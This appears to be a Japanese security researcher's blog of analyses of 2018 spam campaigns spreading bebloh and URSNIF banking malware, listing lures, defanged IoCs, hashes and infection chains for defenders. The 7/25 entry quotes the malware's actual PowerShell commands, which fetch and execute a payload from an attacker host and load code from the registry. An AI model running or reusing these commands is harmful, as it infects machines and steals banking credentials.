bomb_log

セキュリティに関するbom

2018/08/08(水) 『ご請求額の通知』『インボイス』『プロジェクト』『写真』『支払い』『文書』『請求・支払データ』『資料』の調査

8/6に続き、8/8にも.iqyファイルを添付した不審メール のばらまきを確認しています。

 

■日時
2018/8/8 17:00頃 - 

■件名
ご請求額の通知
インボイス
プロジェクト
写真
支払い
文書
請求・支払データ
資料

■添付ファイル名
文書_nnnnn.iqy
※nnnnnは数字5桁

f:id:bomccss:20180810030314p:plain

■通信先
添付ファイルが実行されると、まず以下にアクセスを行います。
hxxp://jiglid[.]com/excel

f:id:bomccss:20180810031512p:plain

Cmd.exeからPowerShellで次に以下へアクセスします。
hxxp://jiglid[.]com/version

f:id:bomccss:20180810032506p:plain

ここまでの.iqyファイル、excelファイル、versionファイル、共に8/6で使用されたファイルと次のファイルへのリンクURLが異なるのみで同様の構成のファイルです。
.iqyファイルはアンチウイルスベンダが幾つか検知するようになりましたが、攻撃者が簡単に使いまわしが効く、やっかいな攻撃手法と言えます。

 

■一次検体
以下のファイルが最後のファイルで、不正送金マルウェアURSNIFです。
hxxp://jiglid[.]com/JP

https://www.hybrid-analysis.com/sample/87f0e03c2bb71d7fd620f5693700fca08eefe8f42803051a9d1c4f90e0c5fd57/5b6aa9197ca3e109b452ebe3
●C2:
hxxps://siberponis[.]com
IP: 47.254.203.76
hxxps://baferdifo[.]com

1つ目のC2はこれまでの攻撃キャンペーンでも目にしていたものですが、2つ目のC2はこれまでに見たことのないアドレスです。今後はこのアドレスがしばらくC2として使うものと思われます。
また、C2へのアクセスですが、これまでは443/tcphttpsでアクセスをしていましたが、今回よりhttpsではなく独自プロトコルで通信をするようになっています。
通常の443通信とは異なる通信を検知することで検知可能かも知れません。

 

IoC
●URL
hxxp://jiglid[.]com/excel
hxxp://jiglid[.]com/version
hxxp://jiglid[.]com/JP
hxxps://siberponis[.]com
hxxps://baferdifo[.]com
●IP
47.254.203.76
●HASH(SHA256)
87f0e03c2bb71d7fd620f5693700fca08eefe8f42803051a9d1c4f90e0c5fd57

2018/08/07(火) 『<要返信:FAX>営業○・出荷×』『注文書[※数字4桁]』『インボイス Re: 進捗』の調査

Excelの添付ファイルによるマルウェアへの感染を狙った不審メールのばらまきを観測しました。

 

■日時
2018/08/07 16:30 頃 - 19:00 頃

■件名
<要返信:FAX>営業○・出荷×
注文書[※数字4桁]
インボイス Re: 進捗

■添付ファイル
FAX[出荷].xls
※件名 <要返信:FAX>営業○・出荷× のもの
https://www.hybrid-analysis.com/sample/d48a46e4a294755055ea59256450463b644236b32f62ecbb103b8f0337c4247c/5b69464a7ca3e14611105ff7
https://www.hybrid-analysis.com/sample/8957623c094f3ccdec8102f37d72d39279ecaa6a00f61cfe0c16d34105401e21?environmentId=100
https://www.hybrid-analysis.com/sample/8957623c094f3ccdec8102f37d72d39279ecaa6a00f61cfe0c16d34105401e21?environmentId=100
注文書_office.xls
※件名 注文書[※数字4桁] のもの
https://www.hybrid-analysis.com/sample/324c2f02ac07b1610413d4f14a3f72b91bc322c1497ed01c15a5793192c1acd5?environmentId=100
https://www.hybrid-analysis.com/sample/324c2f02ac07b1610413d4f14a3f72b91bc322c1497ed01c15a5793192c1acd5?environmentId=100
※2018.08.07.xls
※件名 インボイス Re: 進捗 のもの
https://www.hybrid-analysis.com/sample/ae2a04b491f6f19d737b2693b26f7a5d54c724b66d48620577dfbc21f38690b8/5b6965837ca3e1411e39b7b6

添付ファイルは複数種類ありますが、通信先等はどれも同じです。
添付ファイルを開きマクロを有効化すると、最終的にはマルウェアに感染します。

f:id:bomccss:20180810013934p:plain

このExcelにはマクロがついています。マクロの中身はこちらです。Excelが開きマクロが有効化されると Workbook_Open() が呼び出されshellが実行されます。

f:id:bomccss:20180810014229p:plain

このマクロを実行するとReplace等によりcmd.exe /c が作られ、その引数はoX関数により作られます。
oX関数ではcells(5,1)つまりはA5セルを引数としてC2関数にわたされます。A5セルの中身はこちらです。

f:id:bomccss:20180810014521p:plain

C2関数の部分は全て実行されるとmshta.exeからPowerShell.exeのスクリプトになります。

f:id:bomccss:20180810022215p:plain

f:id:bomccss:20180810014818p:plain


■通信先
添付ファイルのマクロが実行されると、上記流れにより、以下へとアクセスします。
hxxp://jiglid[.]com/out
IPは複数に紐付いています。
109.166.237.170
134.19.224.215
186.87.135.2
188.27.226.49
197.255.246.6
2.89.149.96
31.5.167.149
37.34.176.37
46.55.145.49
5.204.221.1
80.238.111.206
82.79.217.89
86.123.64.43
86.126.136.160
89.149.63.2

f:id:bomccss:20180810020202p:plain

中身はよくわからないファイルとなっていますが、先程のPowerShellにより、この内容がxorされることで新たなPowerShellスクリプトが作成され、以下のファイルを取得します。
hxxp://jiglid[.]com/1.tmp

f:id:bomccss:20180810020701p:plain

このファイルはマイドキュメント配下に1.eというファイルとして作成されます。
これを更に変換をかけることで、LevelUpd.exeという実行ファイルになります。

 

■一次検体(URSNIF)

最後に作成されたexeファイルは不正送金マルウェアのURSNIFです。

●C2
hxxps://siberponis[.]com
IP:47.254.203[.]76

■プロセスの動き 
プロセスの動きは以下となります。

f:id:bomccss:20180810021403p:plain

Excel起動からsvchost.exeが起動するまでのコマンドは以下です。

f:id:bomccss:20180810023350p:plain

 URSNIF実行後の初期感染時の端末情報を取得する際のコマンドは以下です。

f:id:bomccss:20180810023427p:plain

■その他
自動起動の手法はこれまで通りマルウェア本体が設定されていました。
JC3のURSNIF感染判定サイトでは判定できませんでした。
銀行サイト等へアクセスした際に取得する情報はWebアクセスの情報とキーロガーで動画取得はありませんでした。

 

IoC
●URL
hxxp://jiglid[.]com/out
hxxp://jiglid[.]com/1.tmp
hxxps://siberponis[.]com
●IP
109.166.237.170
134.19.224.215
186.87.135.2
197.255.246.6
2.89.149.96
31.5.167.149
37.34.176.37
46.55.145.49
5.204.221.1
80.238.111.206
82.79.217.89
86.123.64.43
86.126.136.160
89.149.63.2
47.254.203.76
●HASH(SHA256)
d48a46e4a294755055ea59256450463b644236b32f62ecbb103b8f0337c4247c
8957623c094f3ccdec8102f37d72d39279ecaa6a00f61cfe0c16d34105401e21
8957623c094f3ccdec8102f37d72d39279ecaa6a00f61cfe0c16d34105401e21
324c2f02ac07b1610413d4f14a3f72b91bc322c1497ed01c15a5793192c1acd5
324c2f02ac07b1610413d4f14a3f72b91bc322c1497ed01c15a5793192c1acd5
ae2a04b491f6f19d737b2693b26f7a5d54c724b66d48620577dfbc21f38690b8

2018/08/06(月) 『お世話になります』『ご確認ください』『写真添付』『写真送付の件』の調査

特殊な形式の添付ファイルがついた不審メールのばらまきを観測しました。
添付ファイルは.iqyファイルであり、Excelに関連付けされており、開くと悪意あるサーバからマルウェアをダウンロードし、最終的には不正送金マルウェアに感染させます。

.iqyファイルに関する注意喚起と対策はIPAより今年7月に出ています。
https://www.ipa.go.jp/files/000068065.pdf
上記を参照し、.iqyファイルをExcelに関連付けないことを推奨します。


■日時
2018/08/06(月) 16:30頃 - 18:40頃

■件名
お世話になります
ご確認ください
写真添付
写真送付の件

■添付ファイル
メールアドレスの@以前のユーザ名.数字5桁.iqy
(例)username.12345.iqy
添付ファイルを実行すると、.iqyファイルは通常Excelに関連付けされており、開くと「Microsoft Excelのセキュリティに関する通知」という警告のポップアップが出ます。「無効にする」を選択すれば問題ありませんが、「有効にする」を選択してしまうと、添付ファイルに記載のURLにファイルを取得しに行きその後マルウェアに感染してしまいます。

添付ファイルの中身は以下の通りです。3行目に記載のURLに接続します。

f:id:bomccss:20180810010923p:plain

■一次接続先
添付ファイルを実行すると同一ドメイン宛に計3回の接続が発生します。
こういった形式で通信が複数回発生するタイプは初めてです。

この接続先となるドメイン hxxp://jiglid[.]com には以下の大量のIPが紐付いています。これも今までには無かったパターンです。
109.224.31.205
124.43.17.103
155.133.93.30
185.42.194.116
185.94.4.228
188.254.205.37
190.140.20.205
190.158.226.15
193.33.1.19
194.204.25.137
195.222.40.54
212.237.112.81
37.143.207.7
37.152.176.90
41.226.17.116
46.40.123.136
46.59.109.240
5.13.77.39
5.204.191.64
62.73.70.146
66.181.168.248
77.81.21.110
78.38.114.17
79.185.30.107
81.12.175.59
82.77.53.5
84.238.147.24
84.54.187.24
88.81.78.98
89.238.207.5
89.44.244.88
89.45.19.18
89.45.19.24
91.139.200.135

 

添付ファイルを実行すると、まず以下のファイルを取得し、実行します。
hxxp://jiglid[.]com/sc4

f:id:bomccss:20180810011300p:plain

この中で更に以下へのアクセスを行います。

hxxp://jiglid[.]com/sc4-2[.]dat

f:id:bomccss:20180810011358p:plain

この中で、http://ipinfo.io/jsonへアクセスにIPが日本のものであれば、更に追加で以下のファイルを取得します。

hxxp://jiglid[.]com/ms[.]xlsx

このファイルはxlsx形式のファイルではなく、実際にはマルウェアであり、tempフォルダ配下にundocument.exeというファイル名で保存・実行し感染します。

このファイルはダウンローダマルウェアのbeblohです。
https://www.hybrid-analysis.com/sample/5533187aeae5b20d0628496f2ee671704bc806b16f4ce8b92468e9db3343957b?environmentId=100
C2: hxxps://wigermexir[.]com
IP:47.254.203[.]76

 

■二次検体
上記beblohはしばらくした後、C2サーバに接続し、以下の接続先から不正送金マルウェアのursnifをダウンロードし感染します。
ここの動作は同じです。
URL: hxxps://socco[.]nl/galleries/2018UP[.]exe
IP: 92.48.206[.]71
https://www.hybrid-analysis.com/sample/9e6535f7cda29e64af7711347271776cbe1242f33c745c61b5320c84eda5bc7e?environmentId=100
C2: hxxps://siberponis[.]com
IP:47.254.203[.]76

 

自動起動設定
ユーザログイン時に自動実行されるプログラムとしてマルウェア本体が登録されます。
7/25にあったファイルレス型のマルウェアの設置方法とは異なります。

f:id:bomccss:20180810012835p:plain

 

IoC
●URL
hxxp://jiglid[.]com/sc4
hxxp://jiglid[.]com/sc4-2[.]dat
hxxp://jiglid[.]com/ms[.]xlsx
hxxps://socco[.]nl/galleries/2018UP[.]exe
hxxps://wigermexir[.]com
hxxps://siberponis[.]com
●IP

109.224.31.205
124.43.17.103
155.133.93.30
185.42.194.116
185.94.4.228
188.254.205.37
190.140.20.205
190.158.226.15
193.33.1.19
194.204.25.137
195.222.40.54
212.237.112.81
37.143.207.7
37.152.176.90
41.226.17.116
46.40.123.136
46.59.109.240
47.254.203[.]76
5.13.77.39
5.204.191.64
62.73.70.146
66.181.168.248
77.81.21.110
78.38.114.17
79.185.30.107
81.12.175.59
82.77.53.5
84.238.147.24
84.54.187.24
88.81.78.98
89.238.207.5
89.44.244.88
89.45.19.18
89.45.19.24
91.139.200.135
92.48.206.71
●Hash(SHA256)
5533187aeae5b20d0628496f2ee671704bc806b16f4ce8b92468e9db3343957b
9e6535f7cda29e64af7711347271776cbe1242f33c745c61b5320c84eda5bc7e

2018/07/25(水) 『【重要】定期的なID・パスワード変更のお願い/コンピュータウイルスにご注意を』の調査

楽天をかたるメールで不正送金マルウェアへの感染を狙った、不審メールのばらまきがありました。
メール内のリンクをクリックし、ダウンロードされるファイルを実行すると感染します。
ばらまきがあった時間は比較的長期間で、ここ最近の中では大量のばらまきでした。4月頃の平均と比較しても2倍程度の量でした。
ダウンロードされたファイルは実行しないようにご注意ください。

 

■日時
2018/07/25(水) 14:30頃 ~ 24:30頃

■件名
【重要】定期的なID・パスワード変更のお願い/コンピュータウイルスにご注意を
※過去2017/11/28,12/01にも来ていた件名です。
https://www.jc3.or.jp/topics/v_log/201712.html#d20171201a

■送信者
rakuten_alert[@]freetoper.review
rakuten_card_information[@]freetoper.loan

■本文

f:id:bomccss:20180727105438p:plain

このメール本文中の「もっと詳しくの情報はこちら:」のリンクをクリックすると以下のファイルがダウンロードされます。
これまで「もっと詳しくの情報はこちら」の名前がついたファイルがダウンロードされることがよくありましたが、このメール形式の時につけたファイル名がそのまま流用されているのだと思われます。

■メール内リンク先URL
(例)hxxp://bb.geographyofpleasure[.]com/
以下のIPに紐付くドメインがメール内のリンク先として利用されています。
IP: 195.123.216.241
https://www.virustotal.com/#/ip-address/195.123.216.241
virustotalドメインを検索すると、以下大量にでてきます。

ae.austintxmassage.com
ai.geographyofpleasure.com
am.micmed.net
an.creatinghealthyrelationships.ca
au.persuasionsanddesigns.com
au.wildgardenmedia.com
bb.geographyofpleasure.com
bb.rjtica.org
bd.geographyofpleasure.com
bh.houstonweddingphotographersix.com
bh.kk4epy.net
bj.creatinghealthyrelationships.ca
bl.warbanks.com
bn.arranliddel.com
bo.libertyorsecurity.com
bq.w2tbr.net
bs.hiddenav.com
bv.persuasionsanddesigns.com
bw.houstonweddingphotographersix.com
bw.persuasionsanddesigns.com
by.sanantonioweddingphotographersix.com
bz.sanantonioweddingphotographersix.com
cc.hiddenav.com
cc.libertyorsecurity.com
cormes2.isplevel.pro
cu.transrituals.com
cw.warbanks.com
de.kk4epy.com
dm.micmed.net
fk.kk4epy.com
fo.rjtica.org
gb.transrituals.com
gd.clarkpattersonphotography.com
gh.hiddenav.com
gm.kk4epy.net
gp.geographyofpleasure.com
gr.olimpiaboido.com
gu.micmed.com
gy.libertyorsecurity.com
hk.sanantonioweddingphotographersix.com
hn.kk4epy.com
hr.olimpiaboido.com
id.sanantonioweddingphotographersix.com
ie.kk4epy.net
il.libertyorsecurity.com
iq.powermyworld.com
jm.wildgardenmedia.com
kg.powermyworld.com
kh.micmed.com
kn.powermyworld.com
kp.guardyourstuff.com
kr.hiddenav.com
ky.rjtica.org
la.micmed.net
lb.clarkpattersonphotography.com
lb.guardyourstuff.com
lt.transrituals.com
lt.warbanks.com
lu.dallasweddingphotographersix.com
ly.creatinghealthyrelationships.ca
mh.powermyworld.com
mm.powermyworld.com
mp.dallasweddingphotographersix.com
mv.clarkpattersonphotography.com
nc.olimpiaboido.com
nc.w2tbr.net
nf.houstonweddingphotographersix.com
nf.kk4epy.com
ni.micmed.com
nl.w2tbr.net
no.transrituals.com
pa.guardyourstuff.com
pe.houstonweddingphotographersix.com
pf.guardyourstuff.com
pf.micmed.net
pg.houstonweddingphotographersix.com
pg.warbanks.com
ph.clarkpattersonphotography.com
pl.micmed.com
pl.w2tbr.net
py.wildgardenmedia.com
sb.kk4epy.com
sc.kk4epy.net
sd.rjtica.org
se.dallasweddingphotographersix.com
sh.persuasionsanddesigns.com
sk.clarkpattersonphotography.com
sn.geographyofpleasure.com
so.austintxmassage.com
sv.kk4epy.net
sy.wildgardenmedia.com
tc.guardyourstuff.com
tg.rjtica.org
tj.transrituals.com
tj.warbanks.com
tn.olimpiaboido.com
tp.creatinghealthyrelationships.ca
um.austintxmassage.com
um.wildgardenmedia.com
us.hiddenav.com
us.persuasionsanddesigns.com
vn.dallasweddingphotographersix.com
vn.w2tbr.net
wf.creatinghealthyrelationships.ca
wf.olimpiaboido.com
ye.austintxmassage.com
yu.micmed.com
za.micmed.net
zm.libertyorsecurity.com 

 ■リンクからダウンロードされるファイル(ダウンローダ
上記ドメインへアクセスすると、下記ファイルへリダイレクトされダウンロードされます。
もっと詳しくの情報はこちら.pdf.js

f:id:bomccss:20180727111552p:plain

Chrome等でアクセスすると上記ファイルが、IEでアクセスするとzipファイル形式でダウンロードされます。
https://www.hybrid-analysis.com/sample/d696653da07d270fa8471eac5e3f2a09a00dc22eb6d090b889aba5fd209900c3?environmentId=100
このファイルを実行してしまうと、マルウェアに感染してしまいます。

■ダウンロードファイル(ursnif)
上記jsファイルを実行すると、下記からマルウェアをダウンロード・実行し不正送金マルウェアursnifに感染します。
hxxp://bn.arranliddel[.]com/0.bin
IP: 195.123.216[.]241
https://www.hybrid-analysis.com/sample/eaafc6a6ee5500c128475c60358ec7fabbff7a69b05b35a79707be728f60c2cc?environmentId=100

■通信先
感染すると以下C2サーバへ通信を行います。
hxxp://frtisel[.]loan/
IP: 185.82.216[.]219
感染から含めた通信の流れは以下になります。

f:id:bomccss:20180727111846p:plain

マルウェアの動き
マルウェアに感染すると、explorer.exeにプロセスインジェクションし、その後感染端末の情報(IPアドレスレジストリの内容、パッチの情報等)を取得します。
感染から端末情報取得までのプロセスの流れは以下になります。

f:id:bomccss:20180727112446p:plain
上記で実行しているコマンドは以下です。

"C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('hxxp://bn.arranliddel[.]com/0.bin?GUeISE','%teMp%bLd22.eXE'); INvoke-WMiMetHoD -CLass Win32_PROceSs -Name CReAte -ArGumeNTLiSt '%tEMP%bLd22.exe'
"C:\Windows\System32\cmd.exe" /C ping localhost -n 10 && del "C:\Users\username\AppData\Local\TempbLd22.exe"
"C:\Windows\System32\cmd.exe" /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString*1,
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\username\AppData\Local\Temp\20A7.bi1"

感染後、銀行サイト等へアクセスすると動画を撮影し、C2へ送ります。
他にも銀行サイト等へアクセスした際のアクセス履歴やキーボード入力情報のC2への送信、銀行サイトのPC上の表示を改竄しID/PWを搾取する機能もあります。
動画取得先URL等を保持しているコンフィグは7/18と恐らく同様と思われます。
コンフィグに記載された対象サイトは銀行の個人向けサイト、法人向けサイト、仮想通貨の交換サイト、amazonGoogle連絡先、等が含まれていました。

マルウェア自動起動設定
マルウェアを無害化するには、自動起動の設定を削除した上でPCを再起動(またはexploler.exeの再起動)が必要になります。
自動起動は以下のように設定されています。
HKUC\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
f:id:bomccss:20180727114821p:plain
登録されているのは、コマンドプロンプトです。中身はPowerShellレジストリからファイルを取得・実行するものです。

cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString( (get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\A8BC4B81-E777-1A14-B15C-0BEE75506F02').asfe32gt) )

いわゆる、ファイルレス型の起動方法です。
これまでのursnifでは端末のAppData配下にursnifの本体ファイルが格納され、それを起動時に実行する設定になっていましたが、今回より手法が変化しています。
レジストリに登録されている内容は以下です。
f:id:bomccss:20180727120622p:plain
同じフォルダにTorClientのモジュールやコンフィグもあります。
本体のasfe32gtの中身は以下です。

f:id:bomccss:20180727122429p:plain

更にPowerShellスクリプトを実行するようです。一部はbase64デコードされていたり、本当のursnif本体と思われる部分は配列に入れられていました。
スクリプトを整形したものの一部は以下になります。

f:id:bomccss:20180727124623p:plain

 

以上です。

 

IoC

●URL
hxxp://bn.arranliddel[.]com/0.bin
hxxp://frtisel[.]loan/
bb.geographyofpleasure[.]com
ae.austintxmassage[.]com
ai.geographyofpleasure[.]com
am.micmed[.]net
an.creatinghealthyrelationships[.]ca
au.persuasionsanddesigns[.]com
au.wildgardenmedia[.]com
bb.geographyofpleasure[.]com
bb.rjtica[.]org
bd.geographyofpleasure[.]com
bh.houstonweddingphotographersix[.]com
bh.kk4epy[.]net
bj.creatinghealthyrelationships[.]ca
bl.warbanks[.]com
bn.arranliddel[.]com
bo.libertyorsecurity[.]com
bq.w2tbr[.]net
bs.hiddenav[.]com
bv.persuasionsanddesigns[.]com
bw.houstonweddingphotographersix[.]com
bw.persuasionsanddesigns[.]com
by.sanantonioweddingphotographersix[.]com
bz.sanantonioweddingphotographersix[.]com
cc.hiddenav[.]com
cc.libertyorsecurity[.]com
cormes2.isplevel[.]pro
cu.transrituals[.]com
cw.warbanks[.]com
de.kk4epy[.]com
dm.micmed[.]net
fk.kk4epy[.]com
fo.rjtica[.]org
gb.transrituals[.]com
gd.clarkpattersonphotography[.]com
gh.hiddenav[.]com
gm.kk4epy[.]net
gp.geographyofpleasure[.]com
gr.olimpiaboido[.]com
gu.micmed[.]com
gy.libertyorsecurity[.]com
hk.sanantonioweddingphotographersix[.]com
hn.kk4epy[.]com
hr.olimpiaboido[.]com
id.sanantonioweddingphotographersix[.]com
ie.kk4epy[.]net
il.libertyorsecurity[.]com
iq.powermyworld[.]com
jm.wildgardenmedia[.]com
kg.powermyworld[.]com
kh.micmed[.]com
kn.powermyworld[.]com
kp.guardyourstuff[.]com
kr.hiddenav[.]com
ky.rjtica[.]org
la.micmed[.]net
lb.clarkpattersonphotography[.]com
lb.guardyourstuff[.]com
lt.transrituals[.]com
lt.warbanks[.]com
lu.dallasweddingphotographersix[.]com
ly.creatinghealthyrelationships[.]ca
mh.powermyworld[.]com
mm.powermyworld[.]com
mp.dallasweddingphotographersix[.]com
mv.clarkpattersonphotography[.]com
nc.olimpiaboido[.]com
nc.w2tbr[.]net
nf.houstonweddingphotographersix[.]com
nf.kk4epy[.]com
ni.micmed[.]com
nl.w2tbr[.]net
no.transrituals[.]com
pa.guardyourstuff[.]com
pe.houstonweddingphotographersix[.]com
pf.guardyourstuff[.]com
pf.micmed[.]net
pg.houstonweddingphotographersix[.]com
pg.warbanks[.]com
ph.clarkpattersonphotography[.]com
pl.micmed[.]com
pl.w2tbr[.]net
py.wildgardenmedia[.]com
sb.kk4epy[.]com
sc.kk4epy[.]net
sd.rjtica[.]org
se.dallasweddingphotographersix[.]com
sh.persuasionsanddesigns[.]com
sk.clarkpattersonphotography[.]com
sn.geographyofpleasure[.]com
so.austintxmassage[.]com
sv.kk4epy[.]net
sy.wildgardenmedia[.]com
tc.guardyourstuff[.]com
tg.rjtica[.]org
tj.transrituals[.]com
tj.warbanks[.]com
tn.olimpiaboido[.]com
tp.creatinghealthyrelationships[.]ca
um.austintxmassage[.]com
um.wildgardenmedia[.]com
us.hiddenav[.]com
us.persuasionsanddesigns[.]com
vn.dallasweddingphotographersix[.]com
vn.w2tbr[.]net
wf.creatinghealthyrelationships[.]ca
wf.olimpiaboido[.]com
ye.austintxmassage[.]com
yu.micmed[.]com
za.micmed[.]net
zm.libertyorsecurity[.]com 

●Mail sender
rakuten_alert[@]freetoper.review
rakuten_card_information[@]freetoper.loan

●IP
185.82.216[.]219
195.123.216[.]241

●Hash(SHA256)
d696653da07d270fa8471eac5e3f2a09a00dc22eb6d090b889aba5fd209900c3
eaafc6a6ee5500c128475c60358ec7fabbff7a69b05b35a79707be728f60c2cc

 

*1:get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\A8BC4B81-E777-1A14-B15C-0BEE75506F02').asfe32gt

2018/07/5(木) 『【楽天市場】注文内容ご確認(自動配信メール)』の調査

メール内のリンクよりマルウェアをダウンロードさせるタイプの不審メールのばらまきがありました。
メールの宛先には複数のアドレスが入っているので、不審と思えるかと思います。

 

■日時
2018/7/5 14:55頃~

■件名
楽天市場】注文内容ご確認(自動配信メール)

■送信者
order[@]http://rakuten.co [.]jp

■メール内リンク
(例)hxxp://fj.therealityofyourgreatness[.]com/
他も全てIPは195.123.238[.]14

■ダウンロードファイル
もっと詳しくの情報はこちら.pdf.js
https://www.hybrid-analysis.com/sample/48e97bd1819ba5562b297532608b6b3ae5bff2b2d7d3ec47a0221f3f5c55f58b?environmentId=100
ファイルを実行しない限り、マルウェアには感染しません。

■追加でダウンロードされるマルウェア
上記ファイルを実行すると以下マルウェアを取得・感染します。不正送金マルウェア(バンキングトロジャン)ursnifです。
hxxp://gq.takeitalyhome[.]com/032901.bin
https://www.hybrid-analysis.com/sample/a93182cdcde8030cac64378da0406c7f628486ec1cf41b6e49cf5a551c0ab837?environmentId=100

2018/07/04(木) 『【速報版】カード利用のお知らせ(本人ご利用分)』『【楽天カード】カードご請求金額のご案内』の調査

楽天をかたったメールでマルウェアへの感染を狙った不審メールのばらまきを観測しました。

 

■日時
2018/7/4(木)

■件名
【速報版】カード利用のお知らせ(本人ご利用分)
楽天カード】カードご請求金額のご案内

■メール内リンク先 
(例)
hxxp:bm.ourmonthinitaly[.]com
その他、195.123.238[.]14 に解決されるドメイン

■ダウンロードされるファイル
上記ドメインにアクセスすると以下のファイルがダウンロードされます。
もっと詳しくの情報はこちら.PDF.js
https://www.hybrid-analysis.com/sample/c94a4bc939685c10181aa25d548bd4aa93866d9ea6640ca6aa8b8f812bd1d62b?environmentId=100
ファイルを実行しない限り、マルウェアには感染しません。

■二次ダウンロードファイル
上記ファイルを実行すると、以下の不正送金マルウェアursnifに感染します。
hxxp://gq.takeitalyhome[.]com/032901.bin
https://www.hybrid-analysis.com/sample/a93182cdcde8030cac64378da0406c7f628486ec1cf41b6e49cf5a551c0ab837
https://cape.contextis.com/analysis/11963/

■C2
hxxp:pingdns[.]xyz
212.92.98[.]175
hxxp:kp.reslifefurniture[.]com
176.9.164[.]253

 

2018/07/03(水) 『写真送付の件』『写真添付』の調査

添付ファイル付のメールで不正送金マルウェアへの感染を狙った不審メールのばらまきがありました。

 

■日時
2018/7/3(水)

■件名
写真送付の件
写真添付

■添付ファイル
2018.[※].写真.xls
※にはメールアドレスの@の前の部分(name@domain.comの場合name)が入ります
https://www.hybrid-analysis.com/sample/213cadcebaef97e5ef8d96d14f4d6a96bfc59f1273e100c7e86907cff81154c8/5b3b24737ca3e170117e559c
添付ファイルを開きマクロを有効にしない限り、マルウェアには感染しません。安全です。
マクロを有効にすると、見えないところでマルウェアをダウンロード・実行します。

■ダウンロードファイル
ダウンローダマルウェアのbeblohです。
取得先:hxxp://cebtedota[.]com/03062018
https://www.hybrid-analysis.com/sample/2a3d33977c61cb3a40bcee22e804e602651a09911398a56765220e27aacdbc78?environmentId=100
C2:hxxps://wigermexir[.]com
beblohが実行され10分前後するとbeblohはC2へアクセスし、以下の追加マルウェアをダウンロードします。

■二次ダウンロードファイル
不正送金マルウェアのursnifです。
取得先:hxxp://socco[.]nl/galleris/datecenter[.]exe
https://www.hybrid-analysis.com/sample/d4a3de1744591ba52383136178381227b167f872a104b2234385fc32a7a7eafe?environmentId=100
C2:hxxps://siberponis[.]com


なお、同日に以下の件名でも配布されていますが、マクロが動作しないため無害です。
※失敗作
■件名
イメージ送付

■添付ファイル
(例)IMG_4207-2400-A4.xls
https://www.hybrid-analysis.com/sample/a2da8194ed5f8e0a2786a597b63b59231f506e91c77599d7cbc0d10d89d9db07/5b3b1c627ca3e14c580a5735